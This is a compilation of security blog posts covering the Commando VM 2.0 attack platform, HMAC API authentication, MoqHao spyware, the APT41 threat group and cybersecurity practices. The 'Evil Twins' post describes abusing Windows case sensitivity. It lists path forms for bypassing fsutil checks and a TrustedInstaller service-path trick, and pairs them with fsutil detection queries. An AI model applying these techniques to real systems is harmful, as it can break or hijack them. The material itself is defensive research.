Simply put: we all have our perceptions, either individually or collectively, about what is needed when it comes to cybersecurity - and we're not communicating effectively about them. In order to fix this problem, we need to reorder the way that we think about things so that we can have more open and effective dialogue. As Moss said, "communication is a soft skill that leads to better technical outcomes."

Stay tuned for more from Black Hat …

Commando VM 2.0: Customization, Containers, and Kali, Oh My!

The Complete Mandiant Offensive Virtual Machine (“Commando VM”) took the penetration testing community by storm when it debuted in early 2019 at Black Hat Asia Arsenal. Our 1.0 release made headway featuring more than 140 tools. Well now we are back again for another spectacular release, this time at Black Hat USA Arsenal 2019! In this 2.0 release we’ve listened to the community and implemented some new must-have features: Kali Linux, Docker containers, and package customization.

About Commando VM

Penetration testers commonly use their own variants of Windows machines when assessing Active Directory environments. We specifically designed Commando VM to be the go-to platform for performing internal penetration tests. The benefits of using Commando VM include native support for Windows and Active Directory, using your VM as a staging area for command and control (C2) frameworks, more easily (and interactively) browsing network shares, and using tools such as PowerView and BloodHound without any worry about placing output files on client assets.

Commando VM uses Boxstarter, Chocolatey, and MyGet packages to install software and delivers many tools and utilities to support penetration testing. With over 170 tools and growing, Commando VM aims to be the de facto Windows machine for every penetration tester and red teamer.

Recent Updates

Since its initial release at Black Hat Asia Arsenal in March 2019, Commando VM has received three additional updates, including new tools and/or bug fixes. We closed 61 issues on GitHub and added 26 new tools. Version 2.0 brings three major new features, more tools, bug fixes, and much more!

Kali Linux

In 2016 Microsoft released the Windows Subsystem for Linux (WSL). Since then, pentesters have been trying to leverage this capability to squeeze more productivity out of their Windows systems. The fewer virtual machines you need to run, the better. With WSL you can install Linux distributions from the Windows Store and run common Linux commands in a terminal, such as starting up an SSH, MySQL, or Apache server, automating mundane tasks with common scripting languages, and utilizing many other Linux applications within the same Windows system.

In January 2018, Offensive Security announced support for Kali Linux in WSL. With our 2.0 release, Commando VM officially supports Kali Linux on WSL. To get the most out of Kali, we've also included VcXsrv, an X Server that allows us to display the entire Linux GUI on the Windows Desktop (Figure 1). Displaying the Linux GUI and passing windows to Windows had been previously documented by Offensive Security and other professionals, and we have combined these to include the GUI as well as shortcuts to take advantage of popular programs such as Terminator (Figure 2) and DirBuster (Figure 3).


Figure 1: Kali XFCE on WSL with VcXsrv


Figure 2: Terminator on Commando VM – Kali WSL with VcXsrv


Figure 3: DirBuster on Commando VM – Kali WSL with VcXsrv

Docker

Docker is becoming increasingly popular within the penetration testing community, and multiple blog posts detail interesting pentesting functionality built on it. Based on this popularity, Docker has been on our roadmap since the 1.0 release in March 2019, and we now support it with the release of Commando VM 2.0. We pull tools such as Amass and SpiderFoot and provide scripts to launch the containers for each tool. Figure 4 shows an example of SpiderFoot running within Docker.


Figure 4: Impacket container running on Docker

For command-line Docker containers, such as Amass, we created a PowerShell script that automatically runs Amass commands through Docker. This script is also added to the PATH, so users can call amass from anywhere. The script is shown in Figure 5. We encourage users to write their own scripts to do more creative things with Docker.


Figure 5: Amass.ps1 script

This script is also executed when the shortcut is opened.


Figure 6: Amass Docker container executed via PowerShell script
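The wrapper idea is simple enough to sketch outside PowerShell as well. Here is a rough, hypothetical Python equivalent (the image name caffix/amass is an assumption for illustration, not necessarily the image Commando VM uses):

```python
import subprocess
import sys

# Hypothetical Python take on Commando VM's Amass wrapper: forward all
# command-line arguments to an Amass container via `docker run`.
IMAGE = "caffix/amass"  # assumed image name, for illustration only

def build_docker_command(args):
    """Build the `docker run` command line that forwards args to Amass."""
    return ["docker", "run", "--rm", IMAGE] + list(args)

if __name__ == "__main__":
    cmd = build_docker_command(sys.argv[1:])
    print(" ".join(cmd))
    # subprocess.run(cmd)  # uncomment on a host where Docker is installed
```

Placing such a script on the PATH gives the same "call amass from anywhere" effect described above.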

Customization

Not everyone needs all of the tools all of the time. Some tools can extend the installation process by hours, take up many gigabytes of hard drive space, or come with unsuitable licenses and user agreements. On the other hand, maybe you would like to install additional reversing tools available within our popular FLARE VM, or you might prefer one of the many alternative text editors or browsers available from the Chocolatey community feed. Either way, we would like to provide the option to selectively install only the packages you desire. Through customization, you and your organization can also share or distribute the profile to make sure your entire team has the same VM environment. To provide for these scenarios, the last big change for Commando 2.0 is support for installation customization. We recommend using our default profile and removing or adding tools to it as you see fit. Please read the following section to see how.

How to Create a Custom Install

Before we start, please note that after customizing your own edition of Commando VM, the cup all command will only upgrade packages pre-installed within your customized distribution. New packages released by our team in the future will not be installed or upgraded automatically with cup all. When needed, these new packages can always be installed manually using the cinst or choco install command, or by adding them to your profile before a new install.

Simple Instructions

  1. Download the zip from https://github.com/fireeye/commando-vm into your Downloads folder.
  2. Decompress the zip and edit the ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\profile.json file by removing tools or adding tools in the “packages” section. Tools are available from our package list or from the chocolatey repository.
  3. Open an administrative PowerShell window and enable script execution.
    • Set-ExecutionPolicy Unrestricted -f
  4. Change to the unzipped project directory.
    • cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
  5. Execute the install with the -profile_file argument.
    • .\install.ps1 -profile_file .\profile.json

Detailed Instructions

To start customizing your own distribution, you need the following three items* from our public GitHub repository:

  1. Our install.ps1 script
  2. Our sample profile.json
  3. An installation template. We recommend using commandovm.win10.installer.fireeye.

*Note: If you download the project ZIP from GitHub it will contain all three items.

The install script will now support an optional -profile_file argument, which specifies a JSON profile. Without the -profile_file argument, running .\install.ps1 will install the default Commando VM distribution. To customize your edition of Commando VM, you need to create a profile in JSON format, and then pass that to the -profile_file argument. Let us explore the sample profile.json profile (Figure 7).


Figure 7: profile.json profile

This JSON profile starts with the env dictionary which specifies many environment variables used by the installer. These environment variables can, and should, be left to their default values. Here is a list of the supported environment variables:

  • VM_COMMON_DIR specifies where the shared libraries should be installed on the VM. After a successful install, you will find a FireEyeVM.Common directory within this location. This contains a PowerShell module that is shared by our packages.
  • TOOL_LIST_DIR and TOOL_LIST_SHORTCUT specify which directory contains the list of all installed packages within the Start Menu and the name of the desktop shortcut, respectively.
  • RAW_TOOLS_DIR environment variable specifies the location where some tools will be installed. Chocolatey defaults to installing tools in %ProgramData%\Chocolatey\lib. This environment variable by default points to %SystemDrive%\Tools, allowing you to more easily access some tools on the command line.
  • And, finally, TEMPLATE_DIR specifies a template package directory relative to where install.ps1 is on disk. We strongly recommend using the commandovm.win10.installer.fireeye package available on our GitHub repository as the template. If your VM is running Windows 7, please switch to the appropriate commandovm.win7.installer.fireeye package. If you are feeling “hacky” and adventurous, feel free to customize the installer further by modifying the chocolateyinstall.ps1 and chocolateyuninstall.ps1 scripts within the tools directory of the template. Note that a proper template will be a folder containing at least 5 things: (1) a properly formatted nuspec file, (2) a “tools” folder that contains (3) a chocolateyinstall.ps1 file, (4) a chocolateyuninstall.ps1 file, and (5) a profile.json file. If you use our template, the only thing you need to change is the packages.json file. The easiest way to do this is just download and extract the commando-vm zip file from GitHub.

With the environment variables set, you can now specify which packages to install on your own distribution. Some packages accept additional installation arguments. You can see an example of this by looking at the openvpn.fireeye entry. For a complete list of packages available from our feed, please see our package list.
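For illustration only, a stripped-down profile might look like the following. The values and the example.package.fireeye entry are hypothetical placeholders (openvpn.fireeye is the package mentioned above); consult the repository's profile.json for the real defaults:

```json
{
  "env": {
    "VM_COMMON_DIR": "%ProgramData%\\_VM",
    "TOOL_LIST_DIR": "%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Tools",
    "TOOL_LIST_SHORTCUT": "%UserProfile%\\Desktop\\Tools.lnk",
    "RAW_TOOLS_DIR": "%SystemDrive%\\Tools",
    "TEMPLATE_DIR": "commandovm.win10.installer.fireeye"
  },
  "packages": [
    { "name": "example.package.fireeye" },
    { "name": "openvpn.fireeye", "args": "<optional install arguments>" }
  ]
}
```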

Once you finish modifying your profile, you are ready for installation. Run powershell.exe with elevated privileges and execute the following commands to install your own edition of Commando VM, assuming you saved your version of the profile as myprofile.json (Figure 8).
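Assuming the profile sits in the unzipped project directory, these are the same commands from the Simple Instructions above, pointed at your custom profile:

```powershell
Set-ExecutionPolicy Unrestricted -f
cd ${Env:UserProfile}\Downloads\commando-vm-master\commando-vm-master\
.\install.ps1 -profile_file .\myprofile.json
```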


Figure 8: Example myprofile.json

The myprofile.json file can then be shared and distributed throughout your entire organization to ensure everyone has the same VM environment when installing Commando VM.

Conclusion

Commando VM was originally designed to be the de facto Windows machine for every penetration tester and red teamer. Now, with the addition of Kali Linux support, Docker and installation customization, we hope it will be the one machine for all penetration testers and red teamers. For a complete list of tools, and for the installation script, please see the Commando VM GitHub repository. We look forward to addressing user feedback, adding more tools and features, and creating many more enhancements for this Windows attack platform.

Detailing Veracode’s HMAC API Authentication

Veracode’s RESTful APIs use Hash-based Message Authentication Code (HMAC) for authentication, which provides a significant security advantage over basic authentication methods that pass the username and password with every request. Passing credentials in the clear is not a recommended practice from a security perspective; encryption is preferred, but HMAC goes a step further and passes only a unique signature.

Developers familiar with Amazon Web Services (AWS) may already have experience with this method of authentication, as it is the primary method used by AWS.  In fact, Veracode began providing users the ability to use HMAC authentication when utilizing our suite of integration products and Java/C# SDKs in early 2016.

What Is HMAC Authentication?

With Hash-based Message Authentication Code (HMAC), the server and the client share a public ID and a private Secret Key (for more information on obtaining an ID and Secret Key with Veracode, please see our help center).  Unlike a password with basic authentication, the Secret Key is known by the server and client, but is never transmitted.  Rather than sending the Secret Key in the request, it is instead used in combination with a hash function to generate a unique HMAC signature, which is then combined with the public ID, a nonce, and additional information.  The server ultimately receives the request and generates its own HMAC and compares the two – if equal, the request is executed (this process is referred to as the “secret handshake”).  Thus, the Secret Key is used in confirming authenticity and integrity of a request, but never transmitted in that request.  For more information about HMAC, please visit this link.
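As a rough illustration of this pattern, a client-side signer might look like the sketch below. This is a generic example, not Veracode's actual signing scheme; the real header format and the exact data that must be signed are documented in the Veracode Help Center:

```python
import hashlib
import hmac
import os
import time

def sign_request(api_id, secret_key, http_method, url_path):
    """Build an HMAC auth header: the Secret Key itself is never sent,
    only a signature derived from it plus per-request data."""
    nonce = os.urandom(16).hex()            # random per-request value
    timestamp = str(int(time.time()))       # bounds the replay window
    message = "id={}&path={}&method={}&nonce={}&ts={}".format(
        api_id, url_path, http_method, nonce, timestamp)
    signature = hmac.new(secret_key, message.encode(), hashlib.sha256).hexdigest()
    # The request carries the public ID, nonce, timestamp, and signature;
    # the server recomputes the HMAC with its own copy of the key and,
    # if the two match, executes the request.
    return "ID={},TS={},NONCE={},SIG={}".format(api_id, timestamp, nonce, signature)
```

Because the nonce and timestamp feed the hash, a captured header cannot simply be replayed later, and the Secret Key never crosses the wire.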

How Does HMAC Authentication Affect Me?

HMAC provides significant security improvements when making API calls to Veracode.  While more secure than basic authentication, additional steps are required to perform API calls using HMAC.  Veracode does minimize and streamline the HMAC calculation to make this process simple and easy for users. In fact, there are several examples of HMAC authentication code or sample libraries available for your reference in the Veracode Help Center and on our Github page:

If you are looking to use curl or a similar command line tool to execute Veracode API calls, we recommend using HTTPie with the Veracode Python Authentication Library.

If you have any questions about implementing HMAC with your Veracode ID and Key, please post in the Veracode Community Integrations Group. If you haven’t joined yet, you are welcome to join the community.

MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play

The McAfee mobile research team has found a new type of Android malware for the MoqHao phishing campaign (a.k.a. XLoader and Roaming Mantis) targeting Korean and Japanese users. A series of attack campaigns are still active, mainly targeting Japanese users. The new spyware has very different payloads from the existing MoqHao samples. However, we found evidence of a connection between the distribution method used for the existing campaign and this new spyware. All the spyware we found this time pretends to be security applications targeting users in Japan and Korea. We discovered a phishing page related to DNS Hijacking attack, designed to trick the user into installing the new spyware, distributed on the Google Play store.

Fake Japanese Security Apps Distributed on Google Play

We found two fake Japanese security applications. The package names are com.jshop.test and com.jptest.tools2019. These packages were distributed on the Google Play store. The number of downloads of these applications was very low. Fortunately, the spyware apps were quickly removed from the Google Play store, and we acquired the malicious samples thanks to the Google Android Security team.

Figure 1. Fake security applications distributed on Google Play

This Japanese spyware has four command and control functions. Below is the server command list used with this spyware. The spyware attempts to collect device information like IMEI and phone number and steal SMS/MMS messages on the device. These malicious commands are sent from a push service of Tencent Push Notification Service.

Figure 2. Command registration into mCommandReceiver

Table 1. The command lists

*1 Not implemented correctly; the behavior differs from what the command name suggests

We believe that the cybercriminal included minimal spyware features to bypass Google’s security checks to distribute the spyware on the Google Play store, perhaps with the intention of adding additional functionality in future updates, once approved.

Fake Korean Police Apps

Following further investigation, we found other very similar samples to the above fake Japanese security applications, this time targeting Korean users. A fake Korean police application disguised itself as an anti-spyware application. It was distributed with a filename of cyber.apk on a host server in Taiwan (that host has previously been associated with malicious phishing domains impersonating famous Japanese companies). It used the official icon of the Korean police application and a package name containing ‘kpo’, along with references to com.kpo.scan and com.kpo.help, all of which relate to the Korean police.

Figure 3. This Korean police application icon was misappropriated

The Trojanized package was obfuscated with the Tencent packer to hide its malicious spyware payload. Unlike existing MoqHao samples, which hide the control server address and retrieve it via Twitter accounts, this sample simply embeds the C&C server address in the spyware application.

The malware has very similar spyware functionality to the fake Japanese security application. However, this one features many additional commands compared to the Japanese one. Interestingly, the Tencent Push Service is used to issue commands to the infected user.

Figure 4. Tencent Push Service

The code and table below show characteristics of the server command and content list.

Figure 5. Command registration into mCommandReceiver

Table 2. The command lists

*1 Appears to be under construction; the behavior differs from what the command name suggests

There are several interesting functions implemented in this spyware. To place automated phone calls through the default calling application, the KAutoService class checks the content of the active window and automatically clicks the start-call button.

Figure 6. KAutoService class clicks the start button automatically in the active calling application

Another interesting function attempts to disable anti-spam call applications (e.g. whowho – Caller ID & Block), which warn users about suspicious incoming calls from unknown numbers. Disabling these call-security applications allows cybercriminals to place calls without triggering an alert, increasing the success of their social engineering.

Figure 7. Disable anti-spam-call applications

Figure 8. Disable anti-spam-call applications

Table 3. List of disabled anti-spam call applications

Connection with Active MoqHao Campaigns

The malware characteristics and structures are very different from the existing MoqHao samples. We give special thanks to @ZeroCERT and @ninoseki, without whom we could not have identified the connection to the active MoqHao attack and DNS hijacking campaigns. The server script on the phishing website hosting the fake Chrome application leads victims to a fake Japanese security application on the Google Play store (https://play.google.com/store/apps/details?id=com.jptest.tools2019) under specific browser conditions.

Figure 9. The server script redirects users to a fake security application on Google Play (Source: @ninoseki)

There is a strong correlation between the fake Japanese and Korean applications we found this time. They share common spy commands and the same crash report key on a cloud service. Therefore, we concluded that both pieces of spyware are connected to the ongoing MoqHao campaigns.

Conclusion

We believe that the spyware aims to masquerade as a security application and perform spy activities, such as tracking device location and eavesdropping on call conversations. It is distributed via an official application store that many users trust. The attack campaign is still ongoing, and it now features a new Android spyware that has been created by the cybercriminals. McAfee is working with Japanese law enforcement agencies to help with the takedown of the attack campaign. To protect your privacy and keep your data from cyber-attacks, please do not install apps from outside of official application stores. Keep firmware up to date on your device and make sure to protect it from malicious apps by installing security software on it.

McAfee Mobile Security detects this threat as Android/SpyAgent and alerts mobile users if it is present, while protecting them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com

Appendix – IOCs

Table 4. Fake Japanese security application IOCs

Table 5. Fake Korean police application IOCs

The post MoqHao Related Android Spyware Targeting Japan and Korea Found on Google Play appeared first on McAfee Blogs.

APT41: A Dual Espionage and Cyber Crime Operation

Today, FireEye Intelligence is releasing a comprehensive report detailing APT41, a prolific Chinese cyber threat group that carries out state-sponsored espionage activity in parallel with financially motivated operations. APT41 is unique among tracked China-based actors in that it leverages non-public malware typically reserved for espionage campaigns in what appears to be activity for personal gain. Explicit financially-motivated targeting is unusual among Chinese state-sponsored threat groups, and evidence suggests APT41 has conducted simultaneous cyber crime and cyber espionage operations from 2014 onward.

The full published report covers historical and ongoing activity attributed to APT41, the evolution of the group’s tactics, techniques, and procedures (TTPs), information on the individual actors, an overview of their malware toolset, and how these identifiers overlap with other known Chinese espionage operators. APT41 partially coincides with public reporting on groups including BARIUM (Microsoft) and Winnti (Kaspersky, ESET, Clearsky).

Who Does APT41 Target?

Like other Chinese espionage operators, APT41 espionage targeting has generally aligned with China's Five-Year economic development plans. The group has established and maintained strategic access to organizations in the healthcare, high-tech, and telecommunications sectors. APT41 operations against higher education, travel services, and news/media firms provide some indication that the group also tracks individuals and conducts surveillance. For example, the group has repeatedly targeted call record information at telecom companies. In another instance, APT41 targeted a hotel’s reservation systems ahead of Chinese officials staying there, suggesting the group was tasked to reconnoiter the facility for security reasons.

The group’s financially motivated activity has primarily focused on the video game industry, where APT41 has manipulated virtual currencies and even attempted to deploy ransomware. The group is adept at moving laterally within targeted networks, including pivoting between Windows and Linux systems, until it can access game production environments. From there, the group steals source code as well as digital certificates which are then used to sign malware. More importantly, APT41 is known to use its access to production environments to inject malicious code into legitimate files which are later distributed to victim organizations. These supply chain compromise tactics have also been characteristic of APT41’s best known and most recent espionage campaigns.

Interestingly, despite the significant effort required to execute supply chain compromises and the large number of affected organizations, APT41 limits the deployment of follow-on malware to specific victim systems by matching against individual system identifiers. These multi-stage operations restrict malware delivery only to intended victims and significantly obfuscate the intended targets. In contrast, a typical spear-phishing campaign’s desired targeting can be discerned based on recipients' email addresses.

A breakdown of industries directly targeted by APT41 over time can be found in Figure 1.

 


Figure 1: Timeline of industries directly targeted by APT41

Probable Chinese Espionage Contractors

Two identified personas using the monikers “Zhang Xuguang” and “Wolfzhi” linked to APT41 operations have also been identified in Chinese-language forums. These individuals advertised their skills and services and indicated that they could be hired. Zhang listed his online hours as 4:00pm to 6:00am, similar to APT41 operational times against online gaming targets and suggesting that he is moonlighting. Mapping the group’s activities since 2012 (Figure 2) also provides some indication that APT41 primarily conducts financially motivated operations outside of their normal day jobs.

Attribution to these individuals is backed by identified persona information, their previous work and apparent expertise in programming skills, and their targeting of Chinese market-specific online games. The latter is especially notable because APT41 has repeatedly returned to targeting the video game industry and we believe these activities were formative in the group’s later espionage operations.


Figure 2: Operational activity for gaming versus non-gaming-related targeting based on observed operations since 2012

The Right Tool for the Job

APT41 leverages an arsenal of over 46 different malware families and tools to accomplish their missions, including publicly available utilities, malware shared with other Chinese espionage operations, and tools unique to the group. The group often relies on spear-phishing emails with attachments such as compiled HTML (.chm) files to initially compromise their victims. Once in a victim organization, APT41 can leverage more sophisticated TTPs and deploy additional malware. For example, in a campaign running for almost a year, APT41 compromised hundreds of systems and used close to 150 unique pieces of malware including backdoors, credential stealers, keyloggers, and rootkits.

APT41 has also deployed rootkits and Master Boot Record (MBR) bootkits on a limited basis to hide their malware and maintain persistence on select victim systems. The use of bootkits in particular adds an extra layer of stealth because the code is executed prior to the operating system initializing. The limited use of these tools by APT41 suggests the group reserves more advanced TTPs and malware only for high-value targets.

Fast and Relentless

APT41 quickly identifies and compromises intermediary systems that provide access to otherwise segmented parts of an organization’s network. In one case, the group compromised hundreds of systems across multiple network segments and several geographic regions in as little as two weeks.

The group is also highly agile and persistent, responding quickly to changes in victim environments and incident responder activity. Hours after a victimized organization made changes to thwart APT41, for example, the group compiled a new version of a backdoor using a freshly registered command-and-control domain and compromised several systems across multiple geographic regions. In a different instance, APT41 sent spear-phishing emails to multiple HR employees three days after an intrusion had been remediated and systems were brought back online. Within hours of a user opening a malicious attachment sent by APT41, the group had regained a foothold within the organization's servers across multiple geographic regions.

Looking Ahead

APT41 is a creative, skilled, and well-resourced adversary, as highlighted by the operation’s distinct use of supply chain compromises to target select individuals, consistent signing of malware using compromised digital certificates, and deployment of bootkits (which is rare among Chinese APT groups).

Like other Chinese espionage operators, APT41 appears to have moved toward strategic intelligence collection and establishing access and away from direct intellectual property theft since 2015. This shift, however, has not affected the group's consistent interest in targeting the video game industry for financially motivated reasons. The group's capabilities and targeting have both broadened over time, signaling the potential for additional supply chain compromises affecting a variety of victims in additional verticals.

APT41's links to both underground marketplaces and state-sponsored activity may indicate the group enjoys protections that enable it to conduct its own for-profit activities, or that authorities are willing to overlook them. It is also possible that APT41 has simply evaded scrutiny from Chinese authorities. Regardless, these operations underscore a blurred line between state power and crime that lies at the heart of threat ecosystems and is exemplified by APT41.

The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land

In the first of this 3-part blog series, we covered the implications of promoting files to “Evil Twins” where they can be created and remain in the system as different entities once case sensitiveness is enabled.

In this 2nd post we try to abuse applications that do not work well with CS changes, abusing years of “normalization” assumptions.

It is worth noting that the impact of this change will vary depending on the target folder.

Out of the box, Windows provides a tool (fsutil.exe) to change CS information by invoking the underlying API NtSetInformationFile with the FileCaseSensitiveInformation information class.

This tool contains several checks at user-mode level to restrict the target folder but, as usual, it can be easily bypassed using different path combinations. It is possible to create a tool or invoke the API from PowerShell to remove these checks.
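For reference, toggling and checking the flag on a directory with the built-in tool looks like this (Windows 10, elevated prompt; C:\test is just an example path):

```
fsutil.exe file setCaseSensitiveInfo C:\test enable
fsutil.exe file queryCaseSensitiveInfo C:\test
```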

Let us go over the following scenarios:

  • Changing ROOT drive CS:
    1. fsutil restrictions will be bypassed, and most console commands will not work unless you specify full paths (mostly because environment variables break under case sensitiveness).

  • Combinations to bypass this check include:
    • \\?\C:\ (by drive letter with long path)
    • \\.\BootPartition\\  (by partition)
    • \\?\Volume{3fb4edf7-edf1-4083-84f8-7fbca215bfee}\ (volume id)
  • Change “protected folders” CS.
    1. For some folders, being Administrator is not enough; other types of ACLs are required.
    2. TrustedInstaller has the required permissions to do so and… you just need Admin permissions to change the service path:

If you change Windows folder case sensitiveness by using the same technique, Windows will not boot anymore.

These scenarios introduce new unexpected behaviors in the current applications, like for instance:

  • Start with a CS-enabled folder containing two directories with the same name in different case.
  • Trying to disable CS on that folder fails with a “multiple files/folders with the same name already exist” check.
  • Move one of the directories to the recycle bin.
  • Change the CS setting of the folder.
  • Restore the deleted directory.
  • The contents of the restored directory overwrite the one that was originally kept.

Screenshots

Left: Root drive with case sensitive enabled.

Right: Program Files CS changed thanks to the TrustedInstaller ACL. If an application does not consider the proper case, the next time it tries to execute a binary whose name may be normalized (to uppercase), it can spawn a different app.

Watch the video recorded by our expert Cedric Cochin illustrating this technique:

Protection and Detection with McAfee Products

  • Products that rely on SysCore will protect C:\ from case sensitive changes
  • Endpoint Security Expert Rules
  • Active Response:
    • Create a custom collector to query Case sensitiveness of important folders.
    • Search for fsutil executions (or even History Processes if that collector is part of your Active Response version)
      • “Processes where Processes name equals fsutil.exe”
    • MVISION EDR:
      • Realtime search
        • “Processes where Processes name equals fsutil.exe”
      • Search for fsutil execution in the historical view

Artifacts involved:

  • NT attributes change
  • Fsutil execution
  • Trusted Installer service changes

Outcomes for this technique include:

  • A ransomware could create C:\Windows\SYSTEM32 and cause a BSOD on next restart
  • A different DLL could be loaded, or an application could be prevented from starting

The post The Twin Journey, Part 2: Evil Twins in a Case In-sensitive Land appeared first on McAfee Blogs.

7 Cybersecurity Practices to Protect Organizations from Future Threats


Cybersecurity is the process of protecting and defending an enterprise’s use of cyberspace by detecting, preventing, and responding to malicious attacks, whether they disable systems, disrupt operations, inject malware, or otherwise aim to harm the organization.

At its core, cybersecurity defends your organization from malicious attacks aimed at disrupting operations and stealing information. Cybersecurity risk is similar to financial and reputational risk: it can directly affect the organization’s growth, driving costs up and adversely affecting revenue.

If you’re a part of an organization, and especially if your workplace stores sensitive information about individuals or clients, then this is an ideal time to educate yourself about cybersecurity and ways to safeguard your organization against cyber attacks and threats, with the help of professionals who hold cybersecurity certifications.

  1. Enable Firewall

In football, there’s a famous phrase: “Attack is the first line of defense.” In cybersecurity, the firewall serves the same purpose. A firewall blocks unauthorized access to your systems, mail services, and websites. In addition to the external firewall, consider installing internal firewalls on the work network, as well as on employees’ home networks for those who work remotely.

  2. Conduct Cybersecurity Awareness Training

According to a recent survey, 77% of respondents admitted that they use free public Wi-Fi networks to access work-related documents or have connected their corporate devices to such networks, which are most often unsecured. Only 17% said that they use a VPN when outside the office.


33% of insider threat incidents are caused by employee mistakes or carelessness, and these mistakes are preventable. According to SANS, cybersecurity experts report that awareness programs have made a tangible impact on their organizations’ security.

  3. Back Up Company Data

This is one of the most prioritized security practices among cybersecurity professionals, and backing up your data can be a lifesaver: with the advent of Trojan horses and ransomware, a small mistake can lead to a complete data wipeout.


Handling the backed-up data is equally important. Make sure backups are thoroughly protected, encrypted, and updated frequently.
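Integrity checking is one concrete way to protect a backup. As a minimal sketch (the chunk size and file handling here are illustrative assumptions, not from the article), a checksum recorded at backup time can be recomputed after a restore to detect corruption or tampering:

```python
import hashlib

def backup_digest(path: str) -> str:
    """Compute a SHA-256 digest of a backup file; store the digest separately
    and recompute it after restore to detect corruption or tampering."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):  # stream in 64 KiB chunks
            h.update(chunk)
    return h.hexdigest()
```

Pairing a digest like this with encryption covers both halves of the advice above: the ciphertext protects confidentiality, and the digest detects silent modification.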

  4. Multi-Factor Authentication

MFA (multi-factor authentication) is considered one of the most prominent cybersecurity practices among professionals. MFA adds an extra layer of protection to any data it guards.


Even if a malicious attacker reaches your sensitive data, they must still pass additional layers of authentication before they can do any harm. These mechanisms also typically send notifications, so any suspicious attempt is reported to the user through multiple communication channels.
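As an illustration of that extra layer, one common second factor is a time-based one-time password (TOTP, RFC 6238), which the server and the user's authenticator derive independently from a shared secret. A minimal sketch using only Python's standard library (the secret below is the RFC 6238 test value, not a real credential):

```python
import base64, hashlib, hmac, struct, time

def totp(secret_b32: str, digits: int = 6, interval: int = 30, now=None) -> str:
    """Time-based one-time password (RFC 6238) over HMAC-SHA1."""
    key = base64.b32decode(secret_b32, casefold=True)
    counter = int((time.time() if now is None else now) // interval)
    digest = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F                               # dynamic truncation (RFC 4226)
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)

# RFC 6238 test vector: ASCII secret "12345678901234567890", time = 59 s
print(totp("GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ", digits=8, now=59))  # "94287082"
```

A login flow would accept the password only when the submitted code also matches one computed server-side for the current 30-second window.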

  5. Bring Your Own Device (BYOD) Policies

BYOD policies have been around since 2004, and they have only continued to boom in corporate culture. It is predicted that the BYOD market will hit $367B by 2022. Research also suggests that companies that opt for BYOD save about $350 per year for every employee.

Sure, letting employees use their own devices for work increases their productivity, but it also makes the organization’s data more susceptible to cyberattacks. With the increasing use of mobile devices, smartwatches, wearables, and IoT products, companies that are serious about BYOD, or about cloud storage in general, should consider the security vulnerabilities and implement stringent policies to protect their valuable information. MDM (mobile device management) software enables the cybersecurity or IT team to enforce security settings and configurations that secure all devices connected to company networks.

  6. Manage Passwords

Changing passwords is a pain, and employees often avoid doing so unless HR or the IT team sits next to them and makes them change their passwords.

Password management is a critical part of corporate security, and in today’s BYOD world it is essential to be extra cautious about data protection. Privileged access accounts are a gold mine for attackers, and unauthorized access to these accounts can doom the growth of the organization.
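On the storage side, password management also means never keeping passwords in plain text. A sketch of salted password hashing with Python's standard library (the iteration count is an illustrative choice, not a mandate from the article; tune it to your hardware):

```python
import hashlib, hmac, os

def hash_password(password: str, iterations: int = 600_000):
    """Derive a PBKDF2-HMAC-SHA256 hash with a random per-account salt."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return salt, digest

def verify_password(password: str, salt: bytes, digest: bytes,
                    iterations: int = 600_000) -> bool:
    """Recompute the hash and compare in constant time."""
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return hmac.compare_digest(candidate, digest)
```

With this scheme a leaked database yields only salts and slow-to-brute-force digests, which is exactly why privileged accounts should never rely on reversible or plain-text storage.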

  7. Document Cybersecurity Policies

Businesses often operate on a verbal basis when it comes to security, while ideally they should document every policy and training operation related to cyberspace. Online portals such as the Small Business Administration (SBA) and the FCC’s Cyberplanner 2.0 provide checklists, online instruction, and information specifically for protecting online businesses.

Conclusion

Always remember that one unsafe click can result in a complete data wipeout or leak, and that educating yourself about cybersecurity practices can help your organization protect itself from threats. This knowledge is useful not just for an organization’s security but for any individual who uses the internet. Staying current on such practices is part of the job, as all kinds of engagement are steadily moving to the cloud.

For additional information, please refer to an article on Cyber security tips you need to know in 2019, published by the Australian UpSkilled institute.



Author Bio:

Gaurav Belani is a senior SEO and content marketing analyst at The 20 Media, a content marketing agency that specializes in data-driven SEO. He has more than seven years of experience in digital marketing and loves to read and write about AI, ML, cybersecurity and other emerging technologies. In his spare time, he enjoys watching movies and listening to music. Connect with him on Twitter @belanigaurav.


The post 7 Cybersecurity Practices to Protect Organizations from Future Threats appeared first on CyberDB.

The McAfee Americas Channel Promise

In my 26th year at McAfee, my fourth leading the Americas Channel Organization, I wanted to take a step back and ask my team a few questions:

  • What does being a part of the McAfee Channel team mean to our partners, to our company, and to our channel employees?
  • Why do we do what we do?
  • What value do we bring?

Over the course of eight weeks, I worked with the core Americas Channel management team and a third-party vendor to frame out the McAfee Americas Channel Promise. This exercise forced us to dig deep into our organization and define what matters, articulate the value of our channel, and more. I would like to share what we launched last month at the Americas Channel All Hands event, because I hope it’s something you can attach yourselves to as a McAfee partner.

I AM McAfee Channel

The Americas Channel is a vital growth engine for increasing market share for McAfee.

We Bring

Scale and market presence

Competitive insights

Deeper customer advocacy

Operational and financial stability

Managed services

Advocacy for partners

Our Value Proposition

Together, we will deliver on our customers’ business outcomes. The channel provides McAfee with the ability to scale effectively and efficiently with our McAfee differentiators. The best way to achieve scale is through a robust, purpose-built channel.

We do this through resellers, system integrators, distributors, OEMs (original equipment manufacturers), security consultants, and service providers.

Our channel community enables us to meet the demands of an ever-changing landscape of customer expectations, consumption models, competitive threats, and shifting markets.

Without Our Channel Community, McAfee Would:

Lack alternative consumption and purchasing options for customers

Sacrifice sales and operational capacity

Increase financial risk and exposure

Lose scale and market presence globally

Miss out on competitive insights

